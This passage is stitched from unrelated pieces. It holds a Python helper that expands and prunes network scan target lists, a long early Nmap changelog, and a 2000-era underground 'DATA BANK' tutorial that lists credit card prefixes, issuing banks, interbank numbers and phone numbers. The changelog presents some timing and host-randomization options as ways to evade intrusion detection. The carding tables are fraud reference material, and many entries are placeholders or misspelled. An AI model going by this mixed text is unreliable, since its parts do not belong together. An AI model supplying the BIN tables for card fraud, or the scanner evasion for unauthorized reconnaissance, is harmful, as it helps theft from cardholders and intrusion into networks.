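Uses 1 and 2 above amount to expanding a target specification and pruning it before anything is sent. The following is an added example, not code from Nmap: `expand_targets` and `build_scan_list` are hypothetical helpers, the octet grammar handled (lists, ranges, `*`, and CIDR blocks) is the one shown in this entry, and the excluded address is constructed.

```python
import ipaddress
from itertools import product


def _expand_octet(field):
    """Expand one dotted field such as '4,5,7-9' or '*' into sorted values."""
    values = set()
    for part in field.split(","):
        if part == "*":
            lo, hi = 0, 255
        elif "-" in part:
            lo_text, hi_text = part.split("-", 1)
            lo, hi = int(lo_text), int(hi_text)   # ValueError on junk
        else:
            lo = hi = int(part)
        if not 0 <= lo <= hi <= 255:
            raise ValueError("octet field %r is out of range" % field)
        values.update(range(lo, hi + 1))
    return sorted(values)


def expand_targets(spec):
    """Return every IPv4 address a spec covers, without sending a packet.

    Accepts CIDR blocks (A.B.C.D/16) and per-octet lists, ranges and
    wildcards (128.4,5,7-9.*.7).
    """
    if "/" in spec:
        network = ipaddress.IPv4Network(spec, strict=False)
        return [str(address) for address in network]
    fields = spec.split(".")
    if len(fields) != 4:
        raise ValueError("expected four dotted fields in %r" % spec)
    octets = [_expand_octet(field) for field in fields]
    return [".".join(str(o) for o in combo) for combo in product(*octets)]


def build_scan_list(spec, fragile):
    """Expand spec and drop hosts that must not be scanned.

    The result is what would be written to a file and handed back with -iL.
    """
    skip = {str(ipaddress.IPv4Address(host)) for host in fragile}
    return [address for address in expand_targets(spec) if address not in skip]


if __name__ == "__main__":
    spec = "128.4,5,7-9.*.7"                      # spec quoted in the entry above
    everything = expand_targets(spec)
    print(spec, "covers", len(everything), "addresses")
    print("first:", everything[0], "last:", everything[-1])
    # Constructed exclusion: one host treated as too fragile to scan.
    pruned = build_scan_list(spec, ["128.5.10.7"])
    print("after exclusions:", len(pruned))
```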

o Added some new fingerprints and adjusted some others based on
submissions to the DB (I still have a lot more to go through so
don't worry if your submission is still not detected).

o Added a warning when you scan 0 hosts (eg "nmap -v"). There are
various other output tweaks as well.

o Ensured that 0.0.0.0 can be scanned by nmap (although on some OSs,
like Linux, it won't work due to what seem to be kernel bugs). Oh
well. I'll look into it later.

Nmap 2.54BETA1

o Added an extremely cool scan type by Gerhard Rieger ( rieger at
iue.tuwien.ac.at ) -- IP Protocol scanning. Basically it sends a
bunch of IP headers (no data) with different "protocol" fields to
the host. The host then (usually) sends back a protocol unreachable
for those that it does not support. By exclusion, nmap can make a
list of those that are supported. This is similar in concept to
(and is implemented using most of the same scanning routines as) UDP
scanning. Note that some hosts do not send back protocol
unreachables -- in that case all protocols will appear "open".

o Fixed an uninitialized variable problem in NmapFE (found by Alvin
Starr (alvin at iplink.net))

o Fixed a packaging problem that led to the Nmap man page being
included twice in the .tgz .

o Fixed dangling nroff include in xnmap man page (noted by Debian Nmap
package maintainer LaMont Jones (lamont(a)security.hp.com))

o Give a warning when no targets at all are specified

o Updated 'make uninstall' so that it deletes all relevant files

o Included latest nmap-rpc from Eilon Gishri (eilon at aristo.tau.ac.il)

o Eliminated -I. from Nmap's and NmapFE's makefiles (suggested by "Jay
Freeman (saurik)" (saurik at saurik.com))

o Added Russian documentation by Alex Volkov

o Added Lithuanian documentation from Aurimas Mikalauskas (inner(a)dammit.lt)

Nmap 2.53

o Fixed a commenting issue that could cause trouble for non-GNU
compilers (first found by Jan-Frode Myklebust (janfrode at
parallab.uib.no))

o A few new services to nmap-services

Nmap 2.52

o Added very simple man pages for xnmap/nmapfe (lack of man pages for
these was noticed by LaMont Jones (lamont(a)hp.com), the Debian Nmap
package maintainer, based on bug report by Adrian Bunk
(bunk(a)fs.tum.de)).

o Fixed a "Status: Down" machine name output problem in machine
parseable logs found by Alek O. Komarnitsky (alek(a)ast.lmco.com)

o Took some weird files out of the doc directory (cd, grep , vi, and
.swp)

o Fixed some typos found by Thomas Klausner (wiz(a)danbala.ifoer.tuwien.ac.at)

o Updated nmap-rpc with new entries found in the latest version of
Eilon Gishri's rpc list.

Nmap 2.51

o Fixed target parsing bug found by Steve Horsburgh (shorsburgh(a)horsburgh.com).

o Changed makefile/rpm to store fingerprint, rpc, and services file in
$prefix/share/nmap rather than $prefix/lib/nmap , since these files
are architecture independent. You should now use ./configure
--datadir instead of ./configure --libdir to change the default
location. Suggested by Thomas Klausner
(wiz(a)danbala.ifoer.tuwien.ac.at).

o I am now including Eilon Gishri's (eilon(a)aristo.tau.ac.il) rpc
number list (which he recently merged with the Nmap 2.50 rpc list).

o Included Spanish and French HTML versions of the Nmap man page (may
not always be up to date).

Nmap 2.50

o Fixed an IP calculation error which could occur in some cases where
you scan machines on different devices (like lo and eth0). This
problem was discovered by Jonathan Fine (jfine(a)psu.edu).

o Fixed a problem that could, in rare cases, cause a SYN scan to
crash (the error message was "attempt to add port number X with
illegal state 0"). This problem was reported by Erik Benner
(erik(a)xyzzy.net)

o Changed the .spec file so that RPM versions create a xnmap link to
nmapfe ( the normal make install has done this for a long time ).

Nmap 2.3BETA21

o A number of people reported problems with nmapfe in various
environments (specifically gdk errors, hangs, and crashes). I think
that is now fixed. Let me know if you still have the problem (make
sure the title bar says BETA21).

o Added a bunch of OS fingerprints based on all the contributions in
the last month or so.

o Fixed a bug that completely broke RPC scanning in BETA19.

o Added list of ports scanned near the top of each machine log WHEN
-v was specified. Here is an example of the format:
# Ports scanned: TCP(13;1-10,22,25) UDP(0;)
The "13" above is the number of TCP ports being scanned.

o Got rid of a snprintf() from nmapfe since some systems don't have it
:( and I'm too lazy to integrate in the snprintf that comes with nmap
right now.

o Fixed important target IP range parsing bug found by Jean-Yves Simon
( lethalwp(a)linuxbe.org ).

o Applied patch by albert chin (china at thewrittenword.com) which
adds --with-libpcap[=DIR] option to configure and adds an
elegant approach for -lnsl and -lsocket checking to configure .

o Fixed a bug which could cause Nmap to mark a port filtered based on
ICMP dest. unreachable packets relating to a different host than the
one being scanned.

o Fixed output problem relating to ident scan noted by Peter Marschall
( peter.marschall at mayn.de )

o Applied patch to services.c by Andrew Brown (atatat(a)atatdot.net)
which prevents some useless debugging (-d) output when reading some
kinds of /etc/services files.

o Added "Host: [machinename] (ip) Status: Down" to machine logs when
the verbose option is given (just like down hosts are reported to
stdout when verbose is given). Suggested by Alek Komarnitsky.

o Applied NetBSD compatibility patch provided by Mipam (reinoud at
ibbnet.org) which changes an autoconf macro to check for
getopt_long_only instead of getopt_long.

o Nmap used to print an inaccuracy warning when no open TCP ports were
found on the target machine. Due to a bug, this was not always
being printed. Problem found by Matt (matt at use.net) and Ajay
Gupta2 (Ajay.Gupta2 at ey.com).

o Added the number of ports in the ignored state right after the state
name in machine parseable logs. It used to look like: "Ignored
State: closed" whereas now it looks like: "Ignored State: closed
(1508)" Meaning that 1508 ports were closed and thus are not
specifically enumerated.

o Changed all nmapfe calls to gdk_font_load into gdk_fontset_load .
Bennett Feitell (bfeitell at panix.com) suggested that this fixed
some nmapfe font problems.

Nmap 2.3BETA20

o Applied patch sent in by s.rapp(a)hrz.uni-dortmund.de which fixes a
memory alignment bug in osscan.c which could cause core dumps on
machines which require aligned access (like SPARC).

o Fixed a compilation problem on machines that do not have MAP_FAILED
defined (as a return value to mmap). Problem noted by Phil
Stracchino (alaric(a)babcom.com).

Nmap 2.3BETA19

o Tweaked the output so that it now tells how many ports are not shown
and what state the ignored ports are in. This info could be
inferred before by people who had studied the manpage, but now the
info is explicitly available. I cleaned up a bunch of stuff
internally to make this happen. I hope I didn't break anything!

o Changed NmapFE so that it always kills any running Nmap process when
you press exit. Problem noted by Marc Renner
(mrenner(a)ci.marysville.wa.us)

o Apparently some Linux (glibc) systems now come with a "strcasestr"
function. So I have made autoconf look for this and use the native
version if supported. (problem noted by Sami Farin
(sfarin(a)ratol.fi)).

o Added a new attribute "Ignored State: xxx" to the machine parseable
logs, where xxx is the state (closed, filtered, or UNfiltered) that
is being ignored. Ports in that state are not listed (they weren't
listed in earlier versions either). Perhaps I should list ALL ports
for machine parseable output. Opinions?

o Merged in a patch sent in by Mipam (reinoud(a)ibbnet.org) which is
apparently part of the OpenBSD Nmap "port". Although Nmap seems to
work fine for me on my OpenBSD 2.4 box, a couple OpenBSD users have
complained of problems. Hopefully this will help. (it adds DLT_LOOP
and DLT_ENC offset cases when reading from libpcap).

o A few really minor bugfixes.

Nmap 2.3BETA18

o Fixed a very important bug that occurred when SYN scanning
localhost. Many thanks to Dries Schellekens (
gwyllion(a)ace.ulyssis.student.kuleuven.ac.be ) for first reporting
the problem.

o Uros Prestor from TurboLinux informed us that the latest versions of
Nmap work with Linux on the upcoming Intel Merced/Itanium IA-64
processors. He also said that the TurboLinux distribution includes
Nmap. Kudos to them! As well as the other distros that support
Nmap (Debian, Red Hat, Suse, Trinux) and of course FreeBSD, NetBSD,
& OpenBSD. Does anyone know if Nmap ships with the latest from
Mandrake or Corel? The latest Solaris includes some Free software.
If anyone can get them to ship Nmap, I will buy you a case of beer
:).

o Added a #define to change vsnprintf to vsprintf on machines which do
not support the former (mostly Solaris 2.5.1 and earlier). This
function is less safe. For people who care about security, we
recommend an upgrade to Solaris 8 (or Linux/*BSD).

o Changed the NmapFE version to 0.[nmap_version] rather than always
leaving it at 0.9.5 (which was confusing). Thanks to J.D.K. Chipps
(jdkc(a)woptura.com) for noticing this.

o Added support for "-vv" (means the same as "-v -v"). Older versions
of Nmap supported it (noted by George Kurtz).

Nmap 2.3BETA17

o Added ACK scanning. This scan technique (which van Houser and
others have been bugging me to add for years :), is great for
testing firewall rulesets. It can NOT find open ports, but it can
distinguish between filtered/unfiltered by sending an ACK packet to
each port and waiting for a RST to come back. Filtered ports will
not send back a RST (or will send ICMP unreachables). This scan
type is activated with -sA .

o Documented the Window scan (-sW) which Lamont Granquist added in
September 99.

o Added a whole bunch of OS fingerprints that people have submitted.

o "Protocol" field in output eliminated. It is now printed right next
to the number (/etc/services style). Like "22/tcp". I wonder what
I should put in the extra white space this leaves on the report :).

o Added --resume option to continue a large network scan where you
left off. This is useful for recovering from errors (modem drops
carrier, network outage, etc). It also allows you to start and stop
for policy reasons (like if a client only wants you to scan on
weekends or at night) or if you want to run the scan on a different
host. Usage is 'nmap --resume logfile' where logfile can be either
normal (-oN) or machine parseable (-oM) logfile from the scan that
was aborted. No other options can be given (the options in the
logfile from the original scan will be used). Nmap will start off
with the host after the last one successfully scanned in the log
file.

o Added --append_output option which causes -oN/-oM/-oS to APPEND to
the output file you specify rather than overwriting it.

o Various internal code cleanup, makefile fixes, etc.

o Changed version number from 2.3BETA* to 2.30BETA* to appease various
packaging systems that thought 2.3BETA was < 2.12 .

o Nmap output to files now correctly flushes output after scanning for
each host is finished.

o Fixed compiler -L flags error found by Ralf Hildebrandt
(R.Hildebrandt(a)tu-bs.de)

o Fixed configure scripts so that options you give to the Nmap
configure (like --prefix ) are also passed to the nmapfe configure
script. This problem was noted by Ralf Hildebrandt
(R.Hildebrandt(a)tu-bs.de). While I was at it, I added some other
cleanups to the system.

o Added --noninteractive option for when nmap is called from scripts
(where stuff like prompting users for info is unacceptable). It
does not currently do anything (Nmap never prompts) and script
writers should probably wait until at least May '2000 so their
scripts still work with earlier versions of Nmap.

o Updated to the latest config.guess and config.sub from Autoconf 2.13

o Applied patch by Sven (s.carstens(a)gmx.de) which fixes a
segmentation fault problem in Nmapfe colored mode as well as some
output niceties.

o Changed some C++ comments to C-style for portability (noticed by
"Sergei V. Rousakov" (sergei(a)cas.Vanderbilt.Edu) )

Nmap 2.3BETA14

o Peter Kosinar (goober(a)gjh.sk) performed some cleanup of the output
routines and as a bonus he added skript kiddie output mode!!! Try
it out by adding "-oS - " to your nmap command line. Note that
using '-' to represent stdout instead of a filename is something you
can do with any of the output modes.

o Ensured that Nmap always gives up on ident scan after the first port
attempt finds it to be closed (problem noticed by Matt
(matt(a)use.net))

o Changed strsep's in nmapfe to more portable strtok's (should
especially help Nmapfe compiles on Solaris)

o Changed permutation algorithm to make port order and host order
shuffling more random.

o Various minor changes and internal code cleanup.

o Fixed integer overflow that was limiting the max --host_timeout
value to about 2,000,000 milliseconds (~1/2 hour). The limit is now
about 4,000,000,000 milliseconds (~1 month). I really hope you
don't need more than that :).

Nmap 2.3BETA13

o I made Nmap smarter about detecting filtering during UDP, Xmas,
NULL, and FIN scans.

o Updated Nmapfe to 0.9.5 (+ a patch from NmapFE author Zach Smith)

o Fixed a problem where NmapFE would fail to honor $PATH (Noticed by
K. Scott Rowe (kscott(a)nmt.edu))

o Added a couple ICMP unreachable messages Nmap was missing (found by
Bifrost (bifrost(a)minions.com)).

o Internal cleanup that improves the way some port lists are stored.

o Added some more RPC numbers from (mmmorris(a)netscape.net)

o Relaxed the dependency requirements of nmapfe rpm (now will accept
any version of Nmap).

Nmap 2.3BETA12

o Added interactive mode which adds convenience for managing nmap
sessions and also enhances privacy. Get to it with --interactive
and then type 'h' for help.

o Added/modified many fingerprints including the latest 2.3.X Linux
releases, the latest Win2000 builds, the Apple Airport Wireless
device, and several dozen more.

o Migrated to RPM .spec file sent in by Tim Powers
(timp(a)redhat.com). That is the file they will be using to package
Nmap with the power tools CD in the next Redhat release. The most
important changes are that Nmap (only the RPM version) now installs
in /usr/* instead of /usr/local/* and the frontend is now
dynamically linked with GTK and comes in a separate rpm.

o The -i (input from list) option has been deprecated. From now on
you should use -iL [filename] to read from a list or -iR to have
Nmap generate random IPs to scan. This -iR option is new.

o The -o and -m options have been deprecated. From now on, you should
use -oN for normal (human readable) output and -oM for machine
parseable output. At some point I might add -oH (HTML output) or
-oSK (sKr|pt kiDdi3 0uTPut).

o Added --randomize_hosts option, which causes hosts to be scanned in
non-sequential order. This makes scans less conspicuous. For
efficiency reasons, the hosts are chopped into groups of 2048 and
then each group is internally shuffled (the groups still go in
order).

o Rearranged the help ('nmap -h' or 'nmap' or 'nmap --help') screen to
be shorter (37 -> 23 lines!) and include some of the new features of
this release. The man page was updated as well.

o Fixed longstanding bug where nmap -sS mylocalnetwork/24 would not
successfully scan the host running nmap.

o Internal improvements to make scanning faster with -i (input list)
or when you specify multiple machines on the command line.

o Uses faster GCD algorithm and fixed several typos (sent in by Peter
Kosinar).

o Provide more information in machine/human readable output files
(start time, end time, RPC program name, Nmap version number)

o Killed the -A option (if you don't know what that is then you won't
miss it. In fact, even if you do know what it is you won't miss
it.)

Nmap 2.3BETA10

o Added about 70 new OS fingerprints so that Nmap can detect more
systems. The most important new fingerprints are probably:
* The new SP5+ NT boxes -- After all these years MS FINALLY made
sequence prediction harder (on NT anyway).
* Solaris 8 Pre-Release
* Sega Dreamcast (Hack that!)
* Latest Windows 2000 builds
* OpenBSD 2.6

Nmap 2.3BETA9

o Applied patch by Mark Abene (Phiber Optik) to fix several type
length issues so that it works on Linux/Alpha.

o Applied patch by Matthieu Verbert (mve(a)zurich.ibm.com) to speed up OSScan

Nmap 2.3Beta8

o Added "firewall mode" timing optimizations which can decrease the
amount of time necessary to SYN or connect scan some heavily
filtered hosts.

o Added min_rtt_timeout timing option (see man page for details)

o Changed "TCP Ping" to use a random ACK value rather than 0 (an IDS
called Snort was using this to detect Nmap TCP Pings).

o Some changes for better Alpha/Linux support based on investigation
by Bill Beers (wbeers(a)carolina.rr.com)

o Applied changes for FDDI support by Tobias J. Nijweide (tobias(a)mesa.nl)

o Applied a socket binding patch from LaMont Jones
(lamont(a)security.hp.com) which can be useful when using -S to
specify one of multiple interfaces on a machine.

o Made OS detection smart enough to first check scan results for a
known closed port instead of immediately resorting to a random one.
This improves OS detection against some machines behind packet
filters. (suggested by van Hauser)

o Applied a shortcut suggestion by Thomas Reinke which can lead to a
tremendous speedup against some firewalled hosts.

o Added some ports commonly used for RPC to nmap-services

o Fixed a problem with the timing of an RPC scan (could come before
the UDP scans they rely on)

o Added a number of new ports to nmap-services

Nmap 2.3Beta6

o Added sophisticated timing controls to give the user much more
control over Nmap's speed. This allows you to make Nmap much more
aggressive to scan hosts faster, or you can make Nmap more "polite"
-- slower but less likely to wreak havoc on your Network. You can
even enforce large delays between sending packets to sneak under IDS
thresholds and prevent detection. See the new "Timing Options"
section of the Nmap man page for more information on using this.

o Applied Lamont Granquist's (lamontg(a)u.washington.edu) Window scan
patch (I changed the name from ACK scan to Window scan since I may
add another scan that uses ACK packets and I don't want them to be
confused). -sW activates this scan type. It is mostly effective
against BSD, AIX, Digital UNIX, and various older HP/UX, SunOS, and
VAX. (See nmap-hackers mailing list archives for an extensive list).

o Added various long options people expect to see like --version ,
--help , --usage , etc. Some of the new timing options are also long.
I had to add getopt_long C files since most non-Linux boxes don't
support getopt_long in libc.

o Human readable (-o) output changed to include the time/date of the
scan. Suggested by van Hauser.

Nmap 2.3-Beta5

o Changed RPC output based on suggestions by David O'Brien
(obrien(a)NUXI.com) and Lance Spitzner (lance(a)spitzner.net). I
got rid of the "(Non-RPC)" unnecessary clutter which appeared after
each non RPC port and the "(untested)" that appeared after each
"filtered" port.

o Added a ton of new OS fingerprints people submitted. I had about
400 in my inbox. Of course, almost 100 of them were submissions for
www.windows2000test.com :).

o Changed the machine parseable output of RPC information to include
the version information. If we figured out the RPC info, it is now
provided as "program-num*lowversion-highversion". If we didn't get
the number, but we think the port is RPC, the field simply contains
"R". If we believe the port is NOT RPC, then the field contains
"N". If the field is empty, we did not RPC scan the port. Thanks
to H D Moore (nlog(a)ings.com) for making me aware how much the
earlier machine parseable RPC logging sucked :).

Nmap 2.3-Beta4

o Added direct (non-portmapper) RPC scanning to determine what RPC
program is listening on a particular port. This works for UDP and
TCP ports and is currently implemented using sockets (which means
you can't use decoys, but on the other hand you don't have to be
root). Thanks go to ga (ga(a)capyork.com) for writing sample code
to demonstrate the technique. The RPC services list included with
nmap was compiled by Vik Bajaj (vbajaj(a)sas.upenn.edu) with help
from various members of the nmap-hackers list.

o Fixed a problem that could cause freezes when you scan machines on
at least two different types of interfaces as part of the same
command.

o Identified and found workaround for Linux kernel bug which allows
connect() to sometimes succeed inappropriately when scanning closed
ports on localhost.

o Fixed problems relating to people who specify the same port more
than once on the command line. While the right answer is "well,
don't do that!", I decided to fix nmap to handle this gracefully.

o Tweaked UDP scanning to be more effective against Solaris ICMP error
limiting.

o Fixed strtol() integer overflow problem found by Renaud Deraison
(deraison(a)cvs.nessus.org)

o The HTML translation of the Man page at
http://www.insecure.org/nmap/nmap_manpage.html should now be
complete (man2html was dropping lines before).

o Added a note in the man page that Nmap 2.0+ is believed to be
COMPLETELY Y2K COMPLIANT! I've been getting a lot of letters from
lawyers about that recently. You should still be able to port scan
on Jan 1st (well ... as long as you have electricity and gangs of
looting thugs haven't stolen your computers :)

Nmap 2.2-Beta4

o Integrated nmapfe code from Zach Smith to allow the nmapfe output
window to resize when you resize the nmapfe window.

o Integrated patch sent in by Stefan Erben (stefan(a)erben.com) which
allows nmap to recognize and ignore null interfaces. If you were
getting a bogus error like "eth0 not found in /proc/net/route" then
this should solve your problem.

o Applied patch from Alexander Savelyev (fano(a)ham.kiev.ua) which
gives nmap the parameters necessary to support SLIP and PPP on BSDI
systems.

o Upgraded to a new version of shtool (1.2.3)

Nmap 2.2-Beta3

o Adopted Ralf S. Engelschall's excellent shtool script for
simplifying the nmap makefile and making it more portable

o Various other minor changes to nmapfe.

Nmap 2.2-Beta2

o Cleaned up build environment more, fixed up RPM and Makefile.in,
eliminated the automake stuff.

o Added nmapfe feature to show nmap command as you change options

o Changed nmapfe to use a global MyWidgets struct rather than tons of
global vars all over the place.

o Made nmapfe much smarter about rejecting stupid option attempts. It
now tries to correct things when you specify illegal options.

o GTK+ 1.0 compatibility fixes

o Integrated nmapfe changes from Zach

Nmap 2.2-BETA1

o Integrated in nmapfe -- a cool front end written by Zach Smith (matrxweb(a)hotmail.com)

Nmap 2.12

o Changed the way tcp connect() scan determines the results of a
connect() call. Hopefully this will make nmap a little more
portable.

o Got rid of the security warning message for people who are missing
/dev/random and /dev/urandom due to complaints about the warning.
This only silences the warnings -- it still uses relatively weak
random number generation under Solaris and other systems that lack
this functionality.

o Eliminated pow() calls on Linux boxes. I think some sort of glibc
bug was causing nmap to sigsegv in some cases inside of pow(). Most
people weren't affected, but those who were would almost always
SIGSEGV with -O.

o Fixed an rpm problem noted by Mark Smith (marks(a)senet.com.au)

Nmap 2.11

o Many new fingerprints added. I received more than 300 submissions
between this release and the last one.

o Fixed IRIX problems which prevented OS scanning from working on that
platform. The problem was researched and solution found by Lamont
Granquist (lamontg(a)u.washington.edu). You can also thank him for
porting nmap to almost every UNIX around.

o Added support for '-m -' to redirect machine readable logs to stdout
for shell pipelining, etc. I also changed machine readable output
to show service names now that we use a nmap specific services file
rather than /etc/services. These features were suggested by Dan
Farmer. You can also thank him for SATAN (the auditing tool).

o Fixed a link-list bug that could cause hangs in UDP,FIN,NULL, and
XMAS scans. Also fixed a ptr problem that could cause SIGSEGV.
These problems were discovered and tracked down by Ben Laurie
(ben(a)algroup.co.uk). You can also thank him for Apache, OpenSSL,
and Apache-SSL.

o Fixed installation problem for people without a /usr/local/man/man1
directory. Found by Jeffrey Robertson (a-jeffro(a)microsoft.com).
I guess you can thank him for Win98 ;).

o Several other little fixes to the installation script and minor
scanner tweaks.

Nmap 2.10

o Private test release

Nmap 2.09

o Private test release

Nmap 2.08

o Bugfix for problem that can cause nmap to appear to "freeze up" for
long periods of time when run on some busy networks. (found by
Lamont Granquist)

Nmap 2.07

o Fixed a lockup on Solaris (and perhaps other proprietary UNIX
systems) caused by a lack of /dev/random & /dev/urandom and a rand()
that only returns values up to 65535. Users of Free operating
systems like Linux, FreeBSD, or OpenBSD probably shouldn't bother
upgrading.

Nmap 2.06

o Fixed compile problems on machines which lack snprintf() (found by
Ken Williams (jkwilli2(a)unity.ncsu.edu))

o Added the squid proxy to nmap-services (suggested by Holger Heimann)

o Fixed a problem where the new memory allocation system was handing
out misaligned pointers.

o Fixed another memory allocation bug which probably doesn't cause any
real-life problems.

o Made nmap look in more places for nmap-os-fingerprints

Nmap 2.05

o Tons of new fingerprints. The number has grown by more than 25%.
In particular, Charles M. Hannum (root(a)ihack.net) fixed several
problems with NetBSD that made it easy to fingerprint and he sent me
a huge new batch of fingerprints for various NetBSD releases down to
1.2. Other people sent NetBSD fingerprints down to 1.0. I finally
got some early Linux fingerprints in (down to 1.09).

o Nmap now comes with its own nmap-services which I created by merging
the /etc/services from a bunch of OS' and then adding Netbus, Back
Orifice, etc.

o Random number generation now takes advantage of the /dev/urandom or
/dev/random that most Free operating systems offer.

o Increased the maximum number of OS guesses nmap will make, told nmap
never to give you two matches where the OS names are byte-to-byte
equivalent. Fixed nmap to differentiate between "no OS matches
found" and "too many OS matches to list".

o Fixed an information leak in the packet TTL values (found by HD
Moore (hdmoore(a)usa.net))

o Fixed the problem noted by Savva Uspensky about offsets used for
various operating systems' PPP/SLIP headers. Due to lack of
responses regarding other operating systems, I have made assumptions
about what works for BSDI, NetBSD, and SOLARIS. If this version no
longer works on your modem, please let me know (and tell me whether
you are using SLIP/PPP and what OS you are running).

o Machine parseable logs are now more machine parseable (I now use a
tab to separate test result fields rather than the more ambiguous
spaces). This may break a few things which rely on the old format.
Sorry. They should be easy to fix.

o Added my nmap-fingerprintinting-article.txt to the distribution in
the docs directory.

o Fixed problem where nmap -sS (my_ethernet_or_ppp_ip_address) would
not correctly scan localhost (due to the kernel rerouting the
traffic through localhost). Nmap should now detect and work around
this behavior.

o Applied patch sent to me by Bill Fenner (fenner(a)parc.xerox.com)
which fixes various SunOS compatibility problems.

o Changed the makefile 'all' target to use install-sh rather than
mkdir -p (doesn't work on some systems)

o Documentation updated and clarified slightly.

o Added this CHANGELOG file to the distribution.

DATA BANK

##########################################################################
Tutorial : DATA BANK
By : bLaCk-iBaNk
Posted : 29 sept 2000
##########################################################################


4xxx VISA
5xxx MASTERCARD
6xxx DISCOVER
37xx AMERICAN EXPRESS

Issuing Bank Name Prefix Interbank # Phone #
-------------------------- -------- ------------ -------------------
AT&T Universal Card 4000 N/A 800-852-8880
Security Bank and Trust 4000 N/A ???-???-????
Citibank 4013
Bank of America 4019 N/A 800-622-0789
Bank of America 4024 N/A 800-622-0789
First Cincinatti 4052 N/A ???-???-????
Navy Fed. Credit Union 4060 N/A 800-336-3333
Security Pacific 4071 N/A 213-763-6400
Bank of America 4085 N/A 800-622-0789
Cal. 1rst Union Bank 4085 N/A 800-230-4922
American Savings and Loan 4090 N/A ???-???-????
Westside Auto Empl. Fed. 4094 N/A 313-???-????
Manny Hanny(mass+8+6483355) 4102 N/A 800-648-9911
Atlantic Financial 4121 N/A 800-556-5678
USAA Federal Savings 4121 N/A 800-922-9092
Union Trust 4122
Citibank Classic 4128 N/A 800-843-0777
State Street Bank 4131 N/A ???-???-????
1rst Interstate 4168 N/A ???-???-????
Great America 1st Sav. 4168 N/A 213-???-????
Bank One of Columbus 4168 N/A ???-???-????
Norwest Banks 4205 N/A ???-???-????
Marine Midland 4215 N/A 800-435-4350
Chase Manhattan 4225 N/A 800-842-8403
Chase Lincoln First Classic 4231 N/A 800-242-7325
Chase Lincoln First Classic 4232 N/A 800-242-7325
American Savings and Loan 4233 N/A 804-???-????
Core State 4239 N/A ???-???-????
Nat. Westminster Bank 4241 N/A 800-527-0086
First Chicago Bank 4250 N/A 312-???-????
Consumers Edge 4253
Security First 4254
First Omni 4262 N/A 619-???-????
Great Western 4262 N/A 213-???-????
Citibank Prefered 4271 N/A 800-843-0777
First Union of Florida 4301 N/A 305-???-????
HHBC 4302 N/A 408-???-????
VNB 4302 N/A ???-???-????
Irvine Bank 4302 N/A 714-???-????
HHB 4303 N/A ???-???-????
Imperial Savings 4310 N/A 213-???-????
Manufacture Hanover Trust 4310 N/A ???-???-????
Security Pacific 4313 N/A 800-553-7762
Gold Dome 4317 N/A 800-334-1601
Cal. Fed. Sav./Loan 4317 N/A 213-???-????
First Atlanta 4327
North Carolina Nat. 4356 N/A ???-???-????
West Side Auto Union 4369 N/A 313-???-????
Bank One of Dayton 4384 N/A ???-???-????
Bank One of N.Y. 4387 N/A 800-942-1977
Bank One of Columbus 4387 N/A ???-???-????
Unisys Fed. Cred. Union 4388 N/A ???-???-????
Sumitomo Bank 4408 N/A 818-912-2501
Cal. First Interstate 4411 N/A 714-980-3509
Melon Bank of Delaware 4417 N/A 302-995-5769
Cal. First Interstate 4418 N/A 714-980-3509
Bank of Hoven 4428 N/A ???-???-????
Citibank 4428 N/A 800-843-0777
1st Interstate 4428 N/A ???-???-????
Western Savings Az. 4429 N/A 602-???-????
Merrill Lynch Bank & Trust 4443 N/A ???-???-????
FootHill Independent 4444 N/A ???-???-????
AmeriTrust 4447
Citibank Maryland Nat. 4500 N/A ???-???-????
G.M.A.C. Fed. Cred. union 4577 N/A 313-???-????
L.A. Fed. Cred. Union 4654 N/A 213-???-????
First Bankcard 4673 N/A ???-???-????
Milage Plus United 4673 N/A ???-???-????
Wells Fargo 4726 N/A 800-642-4720
TRW Sys. Fed. Credit Union 4735 N/A ???-???-????
AT&T's Universal Card 4783
Bank of Hawaii 4811 N/A ???-???-????
San Bernd. County Cent. CU 4820 N/A 714-???-????
U.S. Bank 4833
GE Capitol 4841 N/A ???-???-????
GE Capitol 4880 N/A ???-???-????
Village Bank of Cincinatti 4897 N/A ???-???-????
Citizen's Bank 4911 N/A 800-645-7420

Issuing Bank Name Prefix Interbank # Phone #
-------------------------- -------- ------------ -------------------
Associates Financial Corp 5050 ???? ???-???-????
Wells Fargo 5121 1065 800-642-4720
Bank of Montreal 5191 ???? 416-???-????
Bank of LA. 5127 ???? 504-???-????
Guardian Trust of Canada 5140 ???? 416-???-????
Feather River State Bank 5146 ???? ???-???-????
Security Pacific 5204 1006 800-553-7762
Chemical 5211 1263 ???-???-????
San Diego 1rst Interstate 5212 4732 619-???-????
First Trust Bank 5213 ???? 714-983-0511
Torrance Savings 5215 ???? ???-???-????
Marine Midland 5215 6207 800-435-4350
Manufacturer's Hanover Trust 5217 1033 ???/???-????
Golden Pacific Bank 5220 1225 714-983-4600
Bank of California 5221 1346 818-965-0881
Vineyard National Bank 5225 ???? 800-241-0177
Upland Bank 5226 2861 714-946-2265
Rancho Bank 5227 3224 818-915-1966
Coldwell First Interstate 5228 ???? ???-???-????
1rst Nat. Sav. Bank 5230 6531 714-982-4016
Hunington Bank 5233 1226 ???-???-????
Guardian Trust of Canada 5240 ???? 416-???-????
Virginia Nat. Bank 5241 4630 804-???-????
Chevy Chase Fed. Savings 5242 1667 800-553-1401
Bank of America 5254 1154 800-622-0789
Chemical 5263 1263 ???-???-????
First Interstate of Neb. 5264 ???? ???-???-????
Security Pacific 5270 2742 800-553-7762
Atlantic Financial 5271 4121 800-556-5678
Bank of Amer. MC Gold 5273 1154 800-622-0789
First Interstate 5277 1352 ???-???-????
Wells Fargo 5282 1065 800-642-4720
Chase Lincoln First 5286 ???? 800-242-7325
Village National Bank 5287 ???? ???-???-????
Norwest 5317 6209 800-284-0322
West Savings Az. 5320 4429 602-???-????
Bank of N.Y. 5323 3754 800-942-1977
Western Financial Savings 5329 ???? 800-635-0581
Maryland Bank National 5329 6017 800-421-2110
Citibank Prefered 5410 1035 800-843-0777
Wells Fargo (West) 5410 1065 800-642-4720
Citibank Prefered 5410 6785 ???-???-????
First Finland Bk of Omaha 5411 ???? ???-???-????
First Bankcard 5411 1286 ???-???-????
Sanwa Bank of Cal. 5413 ???? 714-627-7601
Nat. Westmister Bank 5414 ???? 800-527-0086
Key Federal 5414 ???? ???-???-????
Nothrup Credit Union 5415 ???? ???-???-????
Colonial Nat. Bank 5415 ???? 800-544-8205
HouseHold Bank of Cal. 5416 ???? 408-???-????
USAA Fed. Savings Bank 5416 1665 800-922-2092
Bank of N.Y. 5417 3754 800-942-1977
Sacremento Savings and Loan 5418 5310 ???-???-????
First Interstate 5419 ???? ???-???-????
Bank One of Northern Cal. 5419 ???? 209-996-3500
